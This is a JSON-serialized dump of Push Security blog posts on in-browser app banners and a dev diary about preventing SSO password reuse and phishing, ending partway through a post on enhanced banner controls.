",[],{},{"nodeType":254,"data":246203,"content":246204},{},[246205],{"nodeType":178,"data":246206,"content":246207},{},[246208],{"nodeType":173,"value":246209,"marks":246210,"data":246211},"Find an app in your app inventory on the Push platform.",[],{},{"nodeType":254,"data":246213,"content":246214},{},[246215],{"nodeType":178,"data":246216,"content":246217},{},[246218,246222,246227],{"nodeType":173,"value":246219,"marks":246220,"data":246221},"Hit ",[],{},{"nodeType":173,"value":246223,"marks":246224,"data":246226},"Configure on the app details slideout",[246225],{"type":370},{},{"nodeType":173,"value":246228,"marks":246229,"data":246230},", and then add your custom banner message. ",[],{},{"nodeType":254,"data":246232,"content":246233},{},[246234],{"nodeType":178,"data":246235,"content":246236},{},[246237,246240,246245],{"nodeType":173,"value":157297,"marks":246238,"data":246239},[],{},{"nodeType":173,"value":246241,"marks":246242,"data":246244},"Preview",[246243],{"type":370},{},{"nodeType":173,"value":246246,"marks":246247,"data":246248}," button to see what it will look like. ",[],{},{"nodeType":254,"data":246250,"content":246251},{},[246252],{"nodeType":178,"data":246253,"content":246254},{},[246255],{"nodeType":173,"value":246256,"marks":246257,"data":246258},"Then once you're happy, save it to enable it on the signup and login pages for that app. Now your banner will appear every time an employee accesses the app using a browser with the Push browser extension on it. ",[],{},{"nodeType":169,"data":246260,"content":246261},{},[246262],{"nodeType":173,"value":246263,"marks":246264,"data":246265},"Use case inspo",[],{},{"nodeType":235,"data":246267,"content":246268},{},[246269],{"nodeType":173,"value":246270,"marks":246271,"data":246272},"Help employees use ChatGPT and GenAI apps safely",[],{},{"nodeType":178,"data":246274,"content":246275},{},[246276],{"nodeType":173,"value":246277,"marks":246278,"data":246279},"Lots of security teams we speak to are happy for their employees to use GenAI apps like ChatGPT, as long as no sensitive data goes into them. Here we create a banner telling employees not to share sensitive information and to read the GenAI policy to understand how to use apps like this securely.",[],{},{"nodeType":312,"data":246281,"content":246285},{"target":246282},{"sys":246283},{"id":246284,"type":317,"linkType":318},"N6E38qUzEe8fNvpoJwBXH",[],{"nodeType":235,"data":246287,"content":246288},{},[246289],{"nodeType":173,"value":246290,"marks":246291,"data":246292},"Guide your employees toward approved apps and prevent SaaS sprawl",[],{},{"nodeType":178,"data":246294,"content":246295},{},[246296],{"nodeType":173,"value":246297,"marks":246298,"data":246299},"You’ll probably prefer that your employees use approved and supported apps, and not to self-adopt new duplicate apps that contribute to SaaS sprawl. Here we use a banner to tell employees to use an approved file-sharing app.",[],{},{"nodeType":312,"data":246301,"content":246305},{"target":246302},{"sys":246303},{"id":246304,"type":317,"linkType":318},"2VhggiMOWCu9ZXqh4U7pZ9",[],{"nodeType":235,"data":246307,"content":246308},{},[246309],{"nodeType":173,"value":246310,"marks":246311,"data":246312},"Encourage employees to use their federated identities instead of creating shadow identities",[],{},{"nodeType":178,"data":246314,"content":246315},{},[246316],{"nodeType":173,"value":246317,"marks":246318,"data":246319},"If you’ve invested in an SSO solution like Okta, you probably want to get as many of your apps and accounts behind it as possible. This banner tells employees to access the app using their Okta federated identity rather than using or creating a local account. ",[],{},{"nodeType":312,"data":246321,"content":246325},{"target":246322},{"sys":246323},{"id":246324,"type":317,"linkType":318},"6cJcIJ8GpsioU6JQs3afxy",[],{"nodeType":169,"data":246327,"content":246328},{},[246329],{"nodeType":173,"value":71801,"marks":246330,"data":246331},[],{},{"nodeType":178,"data":246333,"content":246334},{},[246335,246338,246344],{"nodeType":173,"value":114452,"marks":246336,"data":246337},[],{},{"nodeType":186,"data":246339,"content":246340},{"uri":473},[246341],{"nodeType":173,"value":88194,"marks":246342,"data":246343},[],{},{"nodeType":173,"value":246345,"marks":246346,"data":246347},". We’ll be happy to show you this feature along with how we discover all the apps your employees are using and how we detect vulnerable identities. ",[],{},"Introducing in-browser app banners: Set guardrails for cloud apps","2024-02-06T00:00:00.000Z","introducing-in-browser-app-banners-set-guardrails-for-cloud-apps",{"items":246352},[246353,246355],{"sys":246354,"name":26137},{"id":26136},{"sys":246356,"name":18399},{"id":18398},{"items":246358},[246359],{"fullName":513,"firstName":71176,"jobTitle":514,"profilePicture":246360},{"url":516},{"__typename":1528,"sys":246362,"content":246363,"title":236248,"synopsis":236249,"hashTags":118,"publishedDate":236250,"slug":236251,"tagsCollection":246825,"authorsCollection":246831},{"id":189461},{"json":246364},{"data":246365,"content":246366,"nodeType":165},{},[246367,246373,246378,246384,246390,246403,246432,246438,246445,246450,246463,246470,246475,246481,246487,246493,246499,246506,246512,246527,246540,246545,246551,246566,246583,246589,246609,246615,246636,246649,246655,246672,246678,246743,246749,246762,246768,246774,246780,246786,246799,246804,246810],{"data":246368,"content":246369,"nodeType":178},{},[246370],{"data":246371,"marks":246372,"value":37,"nodeType":173},{},[],{"data":246374,"content":246377,"nodeType":312},{"target":246375},{"sys":246376},{"id":235737,"type":317,"linkType":318},[],{"data":246379,"content":246380,"nodeType":178},{},[246381],{"data":246382,"marks":246383,"value":235745,"nodeType":173},{},[],{"data":246385,"content":246386,"nodeType":178},{},[246387],{"data":246388,"marks":246389,"value":235752,"nodeType":173},{},[],{"data":246391,"content":246392,"nodeType":178},{},[246393,246396,246400],{"data":246394,"marks":246395,"value":235759,"nodeType":173},{},[],{"data":246397,"marks":246398,"value":235764,"nodeType":173},{},[246399],{"type":370},{"data":246401,"marks":246402,"value":39946,"nodeType":173},{},[],{"data":246404,"content":246405,"nodeType":250},{},[246406,246419],{"data":246407,"content":246408,"nodeType":254},{},[246409],{"data":246410,"content":246411,"nodeType":178},{},[246412,246416],{"data":246413,"marks":246414,"value":235781,"nodeType":173},{},[246415],{"type":370},{"data":246417,"marks":246418,"value":235785,"nodeType":173},{},[],{"data":246420,"content":246421,"nodeType":254},{},[246422],{"data":246423,"content":246424,"nodeType":178},{},[246425,246429],{"data":246426,"marks":246427,"value":235796,"nodeType":173},{},[246428],{"type":370},{"data":246430,"marks":246431,"value":235800,"nodeType":173},{},[],{"data":246433,"content":246434,"nodeType":178},{},[246435],{"data":246436,"marks":246437,"value":235807,"nodeType":173},{},[],{"data":246439,"content":246440,"nodeType":178},{},[246441],{"data":246442,"marks":246443,"value":235815,"nodeType":173},{},[246444],{"type":370},{"data":246446,"content":246449,"nodeType":312},{"target":246447},{"sys":246448},{"id":227773,"type":317,"linkType":318},[],{"data":246451,"content":246452,"nodeType":178},{},[246453,246456,246460],{"data":246454,"marks":246455,"value":235827,"nodeType":173},{},[],{"data":246457,"marks":246458,"value":125683,"nodeType":173},{},[246459],{"type":370},{"data":246461,"marks":246462,"value":235835,"nodeType":173},{},[],{"data":246464,"content":246465,"nodeType":178},{},[246466],{"data":246467,"marks":246468,"value":235843,"nodeType":173},{},[246469],{"type":370},{"data":246471,"content":246474,"nodeType":312},{"target":246472},{"sys":246473},{"id":235848,"type":317,"linkType":318},[],{"data":246476,"content":246477,"nodeType":235},{},[246478],{"data":246479,"marks":246480,"value":235856,"nodeType":173},{},[],{"data":246482,"content":246483,"nodeType":178},{},[246484],{"data":246485,"marks":246486,"value":235863,"nodeType":173},{},[],{"data":246488,"content":246489,"nodeType":178},{},[246490],{"data":246491,"marks":246492,"value":235870,"nodeType":173},{},[],{"data":246494,"content":246495,"nodeType":178},{},[246496],{"data":246497,"marks":246498,"value":235877,"nodeType":173},{},[],{"data":246500,"content":246501,"nodeType":178},{},[246502],{"data":246503,"marks":246504,"value":235885,"nodeType":173},{},[246505],{"type":370},{"data":246507,"content":246508,"nodeType":178},{},[246509],{"data":246510,"marks":246511,"value":235892,"nodeType":173},{},[],{"data":246513,"content":246514,"nodeType":178},{},[246515,246518,246524],{"data":246516,"marks":246517,"value":196087,"nodeType":173},{},[],{"data":246519,"content":246520,"nodeType":186},{"uri":183466},[246521],{"data":246522,"marks":246523,"value":155030,"nodeType":173},{},[],{"data":246525,"marks":246526,"value":196097,"nodeType":173},{},[],{"data":246528,"content":246529,"nodeType":178},{},[246530,246533,246537],{"data":246531,"marks":246532,"value":235914,"nodeType":173},{},[],{"data":246534,"marks":246535,"value":235919,"nodeType":173},{},[246536],{"type":370},{"data":246538,"marks":246539,"value":235923,"nodeType":173},{},[],{"data":246541,"content":246544,"nodeType":312},{"target":246542},{"sys":246543},{"id":24862,"type":317,"linkType":318},[],{"data":246546,"content":246547,"nodeType":178},{},[246548],{"data":246549,"marks":246550,"value":235935,"nodeType":173},{},[],{"data":246552,"content":246553,"nodeType":178},{},[246554,246557,246563],{"data":246555,"marks":246556,"value":235942,"nodeType":173},{},[],{"data":246558,"content":246559,"nodeType":186},{"uri":114007},[246560],{"data":246561,"marks":246562,"value":235949,"nodeType":173},{},[],{"data":246564,"marks":246565,"value":235953,"nodeType":173},{},[],{"data":246567,"content":246568,"nodeType":178},{},[246569,246572,246580],{"data":246570,"marks":246571,"value":235960,"nodeType":173},{},[],{"data":246573,"content":246576,"nodeType":1698},{"target":246574},{"sys":246575},{"id":2405,"type":317,"linkType":318},[246577],{"data":246578,"marks":246579,"value":21642,"nodeType":173},{},[],{"data":246581,"marks":246582,"value":1477,"nodeType":173},{},[],{"data":246584,"content":246585,"nodeType":235},{},[246586],{"data":246587,"marks":246588,"value":235978,"nodeType":173},{},[],{"data":246590,"content":246591,"nodeType":178},{},[246592,246595,246599,246602,246606],{"data":246593,"marks":246594,"value":235985,"nodeType":173},{},[],{"data":246596,"marks":246597,"value":182376,"nodeType":173},{},[246598],{"type":370},{"data":246600,"marks":246601,"value":933,"nodeType":173},{},[],{"data":246603,"marks":246604,"value":235997,"nodeType":173},{},[246605],{"type":370},{"data":246607,"marks":246608,"value":236001,"nodeType":173},{},[],{"data":246610,"content":246611,"nodeType":178},{},[246612],{"data":246613,"marks":246614,"value":236008,"nodeType":173},{},[],{"data":246616,"content":246617,"nodeType":250},{},[246618,246627],{"data":246619,"content":246620,"nodeType":254},{},[246621],{"data":246622,"content":246623,"nodeType":178},{},[246624],{"data":246625,"marks":246626,"value":236021,"nodeType":173},{},[],{"data":246628,"content":246629,"nodeType":254},{},[246630],{"data":246631,"content":246632,"nodeType":178},{},[246633],{"data":246634,"marks":246635,"value":236031,"nodeType":173},{},[],{"data":246637,"content":246638,"nodeType":178},{},[246639,246642,246646],{"data":246640,"marks":246641,"value":236038,"nodeType":173},{},[],{"data":246643,"marks":246644,"value":236043,"nodeType":173},{},[246645],{"type":1646},{"data":246647,"marks":246648,"value":236047,"nodeType":173},{},[],{"data":246650,"content":246651,"nodeType":235},{},[246652],{"data":246653,"marks":246654,"value":236054,"nodeType":173},{},[],{"data":246656,"content":246657,"nodeType":178},{},[246658,246661,246669],{"data":246659,"marks":246660,"value":236061,"nodeType":173},{},[],{"data":246662,"content":246665,"nodeType":1698},{"target":246663},{"sys":246664},{"id":202170,"type":317,"linkType":318},[246666],{"data":246667,"marks":246668,"value":195823,"nodeType":173},{},[],{"data":246670,"marks":246671,"value":236073,"nodeType":173},{},[],{"data":246673,"content":246674,"nodeType":178},{},[246675],{"data":246676,"marks":246677,"value":236080,"nodeType":173},{},[],{"data":246679,"content":246680,"nodeType":250},{},[246681,246701],{"data":246682,"content":246683,"nodeType":254},{},[246684],{"data":246685,"content":246686,"nodeType":178},{},[246687,246690,246698],{"data":246688,"marks":246689,"value":236093,"nodeType":173},{},[],{"data":246691,"content":246694,"nodeType":1698},{"target":246692},{"sys":246693},{"id":202170,"type":317,"linkType":318},[246695],{"data":246696,"marks":246697,"value":236102,"nodeType":173},{},[],{"data":246699,"marks":246700,"value":1477,"nodeType":173},{},[],{"data":246702,"content":246703,"nodeType":254},{},[246704],{"data":246705,"content":246706,"nodeType":178},{},[246707,246710,246718,246721,246729,246732,246740],{"data":246708,"marks":246709,"value":236115,"nodeType":173},{},[],{"data":246711,"content":246714,"nodeType":1698},{"target":246712},{"sys":246713},{"id":228244,"type":317,"linkType":318},[246715],{"data":246716,"marks":246717,"value":63256,"nodeType":173},{},[],{"data":246719,"marks":246720,"value":236127,"nodeType":173},{},[],{"data":246722,"content":246725,"nodeType":1698},{"target":246723},{"sys":246724},{"id":236132,"type":317,"linkType":318},[246726],{"data":246727,"marks":246728,"value":226380,"nodeType":173},{},[],{"data":246730,"marks":246731,"value":933,"nodeType":173},{},[],{"data":246733,"content":246736,"nodeType":1698},{"target":246734},{"sys":246735},{"id":236144,"type":317,"linkType":318},[246737],{"data":246738,"marks":246739,"value":226391,"nodeType":173},{},[],{"data":246741,"marks":246742,"value":236152,"nodeType":173},{},[],{"data":246744,"content":246745,"nodeType":235},{},[246746],{"data":246747,"marks":246748,"value":236159,"nodeType":173},{},[],{"data":246750,"content":246751,"nodeType":178},{},[246752,246755,246759],{"data":246753,"marks":246754,"value":236166,"nodeType":173},{},[],{"data":246756,"marks":246757,"value":236171,"nodeType":173},{},[246758],{"type":370},{"data":246760,"marks":246761,"value":236175,"nodeType":173},{},[],{"data":246763,"content":246764,"nodeType":178},{},[246765],{"data":246766,"marks":246767,"value":236182,"nodeType":173},{},[],{"data":246769,"content":246770,"nodeType":178},{},[246771],{"data":246772,"marks":246773,"value":236189,"nodeType":173},{},[],{"data":246775,"content":246776,"nodeType":178},{},[246777],{"data":246778,"marks":246779,"value":236196,"nodeType":173},{},[],{"data":246781,"content":246782,"nodeType":178},{},[246783],{"data":246784,"marks":246785,"value":236203,"nodeType":173},{},[],{"data":246787,"content":246788,"nodeType":178},{},[246789,246792,246796],{"data":246790,"marks":246791,"value":236210,"nodeType":173},{},[],{"data":246793,"marks":246794,"value":236215,"nodeType":173},{},[246795],{"type":370},{"data":246797,"marks":246798,"value":236219,"nodeType":173},{},[],{"data":246800,"content":246803,"nodeType":312},{"target":246801},{"sys":246802},{"id":236224,"type":317,"linkType":318},[],{"data":246805,"content":246806,"nodeType":235},{},[246807],{"data":246808,"marks":246809,"value":71801,"nodeType":173},{},[],{"data":246811,"content":246812,"nodeType":178},{},[246813,246816,246822],{"data":246814,"marks":246815,"value":114452,"nodeType":173},{},[],{"data":246817,"content":246818,"nodeType":186},{"uri":473},[246819],{"data":246820,"marks":246821,"value":88194,"nodeType":173},{},[],{"data":246823,"marks":246824,"value":236247,"nodeType":173},{},[],{"items":246826},[246827,246829],{"sys":246828,"name":509},{"id":508},{"sys":246830,"name":18399},{"id":18398},{"items":246832},[246833],{"fullName":513,"firstName":71176,"jobTitle":514,"profilePicture":246834},{"url":516},{"__typename":1528,"sys":246836,"content":246838,"title":247269,"synopsis":247270,"hashTags":118,"publishedDate":247271,"slug":247272,"tagsCollection":247273,"authorsCollection":247279},{"id":246837},"1RT7MmC7mJH5H3iWmzgqRI",{"json":246839},{"data":246840,"content":246841,"nodeType":165},{},[246842,246849,246867,246874,246927,246930,246937,246944,246951,246957,246964,246974,246981,246987,246990,246997,247017,247023,247029,247032,247039,247046,247053,247061,247068,247076,247092,247099,247107,247110,247117,247124,247131,247138,247141,247148,247155,247162,247195,247202,247205,247212,247219,247226,247245,247248,247255,247262],{"data":246843,"content":246844,"nodeType":178},{},[246845],{"data":246846,"marks":246847,"value":246848,"nodeType":173},{},[],"We recently released a new feature that prevents employees from reusing their SSO password on other sites. Our goal with this feature is to stop high-risk credentials from being compromised (via phishing or data breach). If you aren’t reusing your Okta password for example, there’s no risk of it being compromised in another breach, and any attempt to dupe a user into using it on a phishing site will fail.",{"data":246850,"content":246851,"nodeType":178},{},[246852,246856,246864],{"data":246853,"marks":246854,"value":246855,"nodeType":173},{},[],"To read more about why we developed this feature and how it works, check out this ",{"data":246857,"content":246858,"nodeType":186},{"uri":9099},[246859],{"data":246860,"marks":246861,"value":246863,"nodeType":173},{},[246862],{"type":194},"earlier blog post",{"data":246865,"marks":246866,"value":197,"nodeType":173},{},[],{"data":246868,"content":246869,"nodeType":178},{},[246870],{"data":246871,"marks":246872,"value":246873,"nodeType":173},{},[],"While the concept for this feature is simple, we learned that there were several important nuances and design choices to make it both effective and practical:",{"data":246875,"content":246876,"nodeType":250},{},[246877,246887,246897,246907,246917],{"data":246878,"content":246879,"nodeType":254},{},[246880],{"data":246881,"content":246882,"nodeType":178},{},[246883],{"data":246884,"marks":246885,"value":246886,"nodeType":173},{},[],"Should employees be allowed to reuse their SSO password if they’re doing it intentionally?",{"data":246888,"content":246889,"nodeType":254},{},[246890],{"data":246891,"content":246892,"nodeType":178},{},[246893],{"data":246894,"marks":246895,"value":246896,"nodeType":173},{},[],"If allowed, how do you give employees the right context to help them be sure they’re only reusing in the intended places?",{"data":246898,"content":246899,"nodeType":254},{},[246900],{"data":246901,"content":246902,"nodeType":178},{},[246903],{"data":246904,"marks":246905,"value":246906,"nodeType":173},{},[],"How do you make the content for an employee-facing feature work for all organizations?",{"data":246908,"content":246909,"nodeType":254},{},[246910],{"data":246911,"content":246912,"nodeType":178},{},[246913],{"data":246914,"marks":246915,"value":246916,"nodeType":173},{},[],"How feasible is it to block all password reuse without encouraging the wrong behaviours or workarounds?",{"data":246918,"content":246919,"nodeType":254},{},[246920],{"data":246921,"content":246922,"nodeType":178},{},[246923],{"data":246924,"marks":246925,"value":246926,"nodeType":173},{},[],"Where does threat intelligence fit into a password phishing prevention feature?",{"data":246928,"content":246929,"nodeType":231},{},[],{"data":246931,"content":246932,"nodeType":169},{},[246933],{"data":246934,"marks":246935,"value":246936,"nodeType":173},{},[],"To warn or to block?",{"data":246938,"content":246939,"nodeType":178},{},[246940],{"data":246941,"marks":246942,"value":246943,"nodeType":173},{},[],"Fundamentally, the feature works by looking for when an employee enters their password for an app into somewhere that isn’t that app. Simple, right? ",{"data":246945,"content":246946,"nodeType":178},{},[246947],{"data":246948,"marks":246949,"value":246950,"nodeType":173},{},[],"The initial plan was that when detected, we’d block the form submission, let the employee know they almost got phished, and ride off into the sunset having saved the day.",{"data":246952,"content":246956,"nodeType":312},{"target":246953},{"sys":246954},{"id":246955,"type":317,"linkType":318},"6M3969P6CfpKVieeyLWVPx",[],{"data":246958,"content":246959,"nodeType":178},{},[246960],{"data":246961,"marks":246962,"value":246963,"nodeType":173},{},[],"Unfortunately, despite password managers becoming more popular, some people still use the same password across multiple apps. In fact, our data shows around 1 in 3 people reuse passwords between accounts and we actually see higher levels of password reuse on IdP apps in particular.",{"data":246965,"content":246966,"nodeType":3769},{},[246967],{"data":246968,"content":246969,"nodeType":178},{},[246970],{"data":246971,"marks":246972,"value":246973,"nodeType":173},{},[],"1 in 3 people reuse passwords, with higher levels of password reuse on IdP apps",{"data":246975,"content":246976,"nodeType":178},{},[246977],{"data":246978,"marks":246979,"value":246980,"nodeType":173},{},[],"Since password reuse is so common, this feature would cause friction by forcing employees to change their reused SSO passwords. Some security teams will consider this a good thing, but others might not be so comfortable. To support both cultures, we introduced WARN mode, where employees are stopped from reusing their password, but they’re given the option to continue anyway.",{"data":246982,"content":246986,"nodeType":312},{"target":246983},{"sys":246984},{"id":246985,"type":317,"linkType":318},"Qj5Uqh1a4ErgJ9Bi1rscE",[],{"data":246988,"content":246989,"nodeType":231},{},[],{"data":246991,"content":246992,"nodeType":169},{},[246993],{"data":246994,"marks":246995,"value":246996,"nodeType":173},{},[],"Customizing block screen content",{"data":246998,"content":246999,"nodeType":178},{},[247000,247004,247013],{"data":247001,"marks":247002,"value":247003,"nodeType":173},{},[],"Through our ",{"data":247005,"content":247007,"nodeType":186},{"uri":247006},"https://pushsecurity.com/blog/introducing-in-browser-app-banners-set-guardrails-for-cloud-apps/",[247008],{"data":247009,"marks":247010,"value":247012,"nodeType":173},{},[247011],{"type":194},"app banner feature",{"data":247014,"marks":247015,"value":247016,"nodeType":173},{},[],", we’ve already learned that orgs like to customize any messages their employees see. This helps them give company-specific information (like how to contact the security team), match the tone of the business, or even just deliver the message in the right language if that’s not English.",{"data":247018,"content":247022,"nodeType":312},{"target":247019},{"sys":247020},{"id":247021,"type":317,"linkType":318},"1BlJyoWAeNm4thWxpnb6s7",[],{"data":247024,"content":247028,"nodeType":312},{"target":247025},{"sys":247026},{"id":247027,"type":317,"linkType":318},"3Cjd6KQHscTcO9csgb6AZ9",[],{"data":247030,"content":247031,"nodeType":231},{},[],{"data":247033,"content":247034,"nodeType":169},{},[247035],{"data":247036,"marks":247037,"value":247038,"nodeType":173},{},[],"Adding helpful context",{"data":247040,"content":247041,"nodeType":178},{},[247042],{"data":247043,"marks":247044,"value":247045,"nodeType":173},{},[],"To help employees tell the difference between a phishing attack and their intentional password reuse, they need to know the context. Specifically, they need to know which password they’re about to enter and where they’re about to enter it. ",{"data":247047,"content":247048,"nodeType":178},{},[247049],{"data":247050,"marks":247051,"value":247052,"nodeType":173},{},[],"For example, a sensible default warning might look something like:",{"data":247054,"content":247055,"nodeType":178},{},[247056],{"data":247057,"marks":247058,"value":247060,"nodeType":173},{},[247059],{"type":13816},"Are you sure? You're about to enter your Okta password into evil.com. This is not Okta.",{"data":247062,"content":247063,"nodeType":178},{},[247064],{"data":247065,"marks":247066,"value":247067,"nodeType":173},{},[],"This is distinctly different from:",{"data":247069,"content":247070,"nodeType":178},{},[247071],{"data":247072,"marks":247073,"value":247075,"nodeType":173},{},[247074],{"type":13816},"Are you sure? You're about to enter your Okta password into openai.com. This is not Okta.",{"data":247077,"content":247078,"nodeType":178},{},[247079,247083,247088],{"data":247080,"marks":247081,"value":247082,"nodeType":173},{},[],"Although I ",{"data":247084,"marks":247085,"value":247087,"nodeType":173},{},[247086],{"type":1646},"shouldn’t",{"data":247089,"marks":247090,"value":247091,"nodeType":173},{},[]," be using the same password for Okta and OpenAI, this extra information gives me the context to make a decision about whether this is intentional. Hopefully it has the added benefit of making me think twice about my intentional password reuse.",{"data":247093,"content":247094,"nodeType":178},{},[247095],{"data":247096,"marks":247097,"value":247098,"nodeType":173},{},[],"This extra context means the message shown to the employee needs to be dynamic. Since we have also established it’s important for our user to be able to customize the message shown, we needed to support these as variables. As such, the final default warning message looks like:",{"data":247100,"content":247101,"nodeType":178},{},[247102],{"data":247103,"marks":247104,"value":247106,"nodeType":173},{},[247105],{"type":13816},"Are you sure? You're about to enter your $IDP password into $URL. This is not $IDP.",{"data":247108,"content":247109,"nodeType":231},{},[],{"data":247111,"content":247112,"nodeType":169},{},[247113],{"data":247114,"marks":247115,"value":247116,"nodeType":173},{},[],"Focusing the scope",{"data":247118,"content":247119,"nodeType":178},{},[247120],{"data":247121,"marks":247122,"value":247123,"nodeType":173},{},[],"This feature could be applied to all passwords to just forcibly prevent password reuse. However, applying it everywhere increases the chances employees will trigger this feature due to intentional password reuse on less sensitive apps. The more they see the block or warn screen, the less weight it will hold.",{"data":247125,"content":247126,"nodeType":178},{},[247127],{"data":247128,"marks":247129,"value":247130,"nodeType":173},{},[],"Password phishing attacks are increasingly targeting identity provider platforms such as Okta and Microsoft 365 and for good reason. With this in mind, we decided to reduce the scope of this feature to only monitor identity provider accounts. This means that when it triggers, it really matters. Hopefully, this ensures employees take the notice seriously.",{"data":247132,"content":247133,"nodeType":178},{},[247134],{"data":247135,"marks":247136,"value":247137,"nodeType":173},{},[],"In the future, if there’s appetite from our customers, we could open this feature up to let security teams choose which apps are protected, so you can apply it to other systems you might consider highly sensitive, such as GitHub or AWS.",{"data":247139,"content":247140,"nodeType":231},{},[],{"data":247142,"content":247143,"nodeType":169},{},[247144],{"data":247145,"marks":247146,"value":247147,"nodeType":173},{},[],"Reducing false positives",{"data":247149,"content":247150,"nodeType":178},{},[247151],{"data":247152,"marks":247153,"value":247154,"nodeType":173},{},[],"It’s imperative the accuracy of this feature is high, since false reports have the potential to cause alarm or annoyance.",{"data":247156,"content":247157,"nodeType":178},{},[247158],{"data":247159,"marks":247160,"value":247161,"nodeType":173},{},[],"As our browser agent is already monitoring for password reuse, we were well positioned to ensure this feature wouldn’t trigger incorrectly by analyzing existing password reuse alerts. ",{"data":247163,"content":247164,"nodeType":178},{},[247165,247169,247174,247178,247182,247186,247191],{"data":247166,"marks":247167,"value":247168,"nodeType":173},{},[],"There were some unexpected examples we needed to make sure were handled correctly, such as the ",{"data":247170,"marks":247171,"value":247173,"nodeType":173},{},[247172],{"type":1646},"newtab",{"data":247175,"marks":247176,"value":247177,"nodeType":173},{},[]," page in Edge – did you know you can login to Microsoft 365 right inside the ",{"data":247179,"marks":247180,"value":247173,"nodeType":173},{},[247181],{"type":1646},{"data":247183,"marks":247184,"value":247185,"nodeType":173},{},[]," page? Since the URL is not ",{"data":247187,"marks":247188,"value":247190,"nodeType":173},{},[247189],{"type":1646},"login.microsoftonline.com",{"data":247192,"marks":247193,"value":247194,"nodeType":173},{},[],", this looks like strange password reuse! Also, certain shopping websites (which shall not be named) resubmit your credentials on every page, which caused the warn screen to be shown for each page visited.",{"data":247196,"content":247197,"nodeType":178},{},[247198],{"data":247199,"marks":247200,"value":247201,"nodeType":173},{},[],"Inside your organization, it is reasonable that you might have your own examples of this - sites which aren’t hosted by your IdP but use the same underlying authentication. To the browser agent, this would look like password reuse, even though it isn’t, because the URL is different. To manage this, the feature starts in MONITOR mode so you can see where, if anywhere, this feature would trigger, and you can build up an ignore list for the browser agent.",{"data":247203,"content":247204,"nodeType":231},{},[],{"data":247206,"content":247207,"nodeType":169},{},[247208],{"data":247209,"marks":247210,"value":247211,"nodeType":173},{},[],"The threat intelligence question",{"data":247213,"content":247214,"nodeType":178},{},[247215],{"data":247216,"marks":247217,"value":247218,"nodeType":173},{},[],"We’ve come all this way and I’ve not mentioned threat intel even once! Surely that is a component of any phishing prevention tool? We considered it – and decided against it. Here’s why.",{"data":247220,"content":247221,"nodeType":178},{},[247222],{"data":247223,"marks":247224,"value":247225,"nodeType":173},{},[],"Primarily, you’d think threat intel could be used to detect known-bad sites and outright block them. And sure, we could do this, but we’d really just be reimplementing Google Safe Browsing. On the assumption we aren’t going to access a better threat intel feed than Google, we wouldn’t be adding anything above what your browser is already doing.",{"data":247227,"content":247228,"nodeType":178},{},[247229,247233,247241],{"data":247230,"marks":247231,"value":247232,"nodeType":173},{},[],"We hope this approach adds an extra layer of protection to the whack-a-mole of threat intel. Back in 2013, David Bianco introduced ",{"data":247234,"content":247235,"nodeType":186},{"uri":74521},[247236],{"data":247237,"marks":247238,"value":247240,"nodeType":173},{},[247239],{"type":194},"the pyramid of pain",{"data":247242,"marks":247243,"value":247244,"nodeType":173},{},[]," which captures this concept well. By generally preventing the TTP of password phishing, we hope to introduce much more pain for an attacker than focusing on known-bad indicators, such as domains.",{"data":247246,"content":247247,"nodeType":231},{},[],{"data":247249,"content":247250,"nodeType":169},{},[247251],{"data":247252,"marks":247253,"value":247254,"nodeType":173},{},[],"Let us know what you think!",{"data":247256,"content":247257,"nodeType":178},{},[247258],{"data":247259,"marks":247260,"value":247261,"nodeType":173},{},[],"Give it a go, we’d love to hear how you get on and whether you have any ideas for how we could strengthen the feature in future.",{"data":247263,"content":247264,"nodeType":178},{},[247265],{"data":247266,"marks":247267,"value":247268,"nodeType":173},{},[],"I didn’t focus on it here, but hopefully it goes without saying that any account that uses a password should be backed with MFA. If you don’t have a good view of which of your employees are using MFA across your cloud identities, Push can do this for you too!","Dev diary: Phishing prevention behind the scenes","Behind the scenes of our approach to designing and developing our latest feature, SSO password protection.","2024-05-13T00:00:00.000Z","dev-diary-phishing-prevention-behind-the-scenes",{"items":247274},[247275,247277],{"sys":247276,"name":18399},{"id":18398},{"sys":247278,"name":26137},{"id":26136},{"items":247280},[247281],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":247282},{"url":19129},{"items":247284},[247285],{"fullName":513,"firstName":71176,"jobTitle":514,"profilePicture":247286},{"url":516},{"json":247288,"links":247647},{"nodeType":165,"data":247289,"content":247290},{},[247291,247298,247305,247310,247317,247324,247329,247335,247342,247349,247356,247363,247377,247383,247390,247404,247411,247416,247423,247437,247444,247449,247456,247491,247498,247503,247510,247517,247534,247541,247548,247554,247561,247568,247587,247594,247601,247618,247625,247631],{"nodeType":178,"data":247292,"content":247293},{},[247294],{"nodeType":173,"value":247295,"marks":247296,"data":247297},"Push recently released a customizable app control called app banners that got a lot of customer love. ",[],{},{"nodeType":178,"data":247299,"content":247300},{},[247301],{"nodeType":173,"value":247302,"marks":247303,"data":247304},"The idea was pretty simple: Display a custom message directly in employee browsers that guided them to use work apps securely, right at the point of login or signup.",[],{},{"nodeType":312,"data":247306,"content":247309},{"target":247307},{"sys":247308},{"id":245394,"type":317,"linkType":318},[],{"nodeType":178,"data":247311,"content":247312},{},[247313],{"nodeType":173,"value":247314,"marks":247315,"data":247316},"Right away, organizations using the app banners feature found a lot of value, and it’s been one of our most quickly adopted features to date.",[],{},{"nodeType":178,"data":247318,"content":247319},{},[247320],{"nodeType":173,"value":247321,"marks":247322,"data":247323},"Building on this success, we recently launched enhanced app banner features that allow you to step up enforcement based on your security goals and policies — from merely informing end-users, all the way to a “soft block.”",[],{},{"nodeType":312,"data":247325,"content":247328},{"target":247326},{"sys":247327},{"id":246120,"type":317,"linkType":318},[],{"nodeType":169,"data":247330,"content":247331},{},[247332],{"nodeType":173,"value":189115,"marks":247333,"data":247334},[],{},{"nodeType":178,"data":247336,"content":247337},{},[247338],{"nodeType":173,"value":247339,"marks":247340,"data":247341},"Here’s a recap on how it all works: Push’s browser agent detects when your employees access any cloud apps using any workforce identities (whether they’re in your IdP or not). ",[],{},{"nodeType":178,"data":247343,"content":247344},{},[247345],{"nodeType":173,"value":247346,"marks":247347,"data":247348},"It can then automatically enforce a range of in-browser security controls. ",[],{},{"nodeType":178,"data":247350,"content":247351},{},[247352],{"nodeType":173,"value":247353,"marks":247354,"data":247355},"We now have four types of controls you can set for app banners. Here they are, in order from softest to hardest:",[],{},{"nodeType":235,"data":247357,"content":247358},{},[247359],{"nodeType":173,"value":247360,"marks":247361,"data":247362},"Informational app 